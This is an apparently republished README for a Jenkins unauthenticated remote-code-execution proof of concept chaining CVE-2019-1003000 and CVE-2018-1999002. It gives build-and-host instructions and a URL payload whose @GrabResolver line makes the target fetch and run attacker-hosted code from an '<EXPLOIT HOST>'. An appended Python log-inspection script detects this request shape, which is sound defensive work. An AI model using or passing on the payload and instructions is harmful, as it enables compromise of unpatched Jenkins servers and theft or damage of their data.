Jenkins RCE PoC. From unauthenticated user to remote code execution (Chaining CV...
source link: https://www.tuicool.com/articles/hit/rIfAjeM
Jenkins RCE PoC. From unauthenticated user to remote code execution - it's a hacker's dream! (Chaining CVE-2019-1003000, CVE-2018-1999002, and more)
README.txt
JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION
---------------------------------------------

Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw).

Read his write-ups on this exploit here -
Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html

His github: https://github.com/orangetw

INSTRUCTIONS:
-------------
- Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder.
- Once that is finished, copy the inner contents of www/ to a webserver.
- In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> with the hostname of where you uploaded your files.

URL Payload:
------------
http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a
@Grab(group='package', module='payload', version='1')%0a
import Payload;
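
A detection check for the request shape in the URL payload above, added here as an example (it is not part of the original repository). It assumes combined-format access logs from a proxy in front of Jenkins; the function name `inspect`, the sample log lines, and the host `files.example.invalid` are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Route and annotations as they appear in the README's URL payload.
ROUTE = re.compile(r"/descriptorByName/[^/?]+/checkScriptCompile", re.I)
GRAPE = re.compile(r"@Grab(?:Config|Resolver)?\s*\(")
ROOT = re.compile(r"root\s*=\s*['\"]([^'\"]+)['\"]")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses and hosts are documentation values.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2019:10:01:22 +0000] "GET /securityRealm/user/admin'
    '/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition'
    '/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a'
    '@GrabResolver(name=%27payload%27,%20root=%27http://files.example.invalid%27)'
    '%0a@Grab(group=%27package%27,%20module=%27payload%27,%20version=%271%27)'
    '%0aimport%20Payload; HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Mar/2019:10:02:03 +0000] '
    '"GET /job/build-app/lastBuild/console HTTP/1.1" 200 8841',
    '198.51.100.9 - - [12/Mar/2019:10:02:40 +0000] "GET /descriptorByName'
    '/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile'
    '?value=println(1) HTTP/1.1" 200 40',
]

def inspect(line):
    """Return a finding for a log line matching the payload shape, else None."""
    match = REQUEST.search(line)
    if not match:
        return None
    parts = urlsplit(match.group(1))
    path = unquote(parts.path)
    if not ROUTE.search(path):
        return None
    # parse_qs percent-decodes, so %0a-separated annotations become real lines.
    script = "\n".join(parse_qs(parts.query).get("value", []))
    if not GRAPE.search(script):
        return None  # ordinary syntax-check request with no Grape annotation
    root = ROOT.search(script)
    return {
        "client": line.split(" ", 1)[0],
        "via_security_realm": "/securityRealm/" in path,
        "resolver_root": root.group(1) if root else None,
    }

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect(entry))
```

A hit with a non-null `resolver_root` names the external host the controller was told to fetch from, which can be cross-checked against egress and DNS logs.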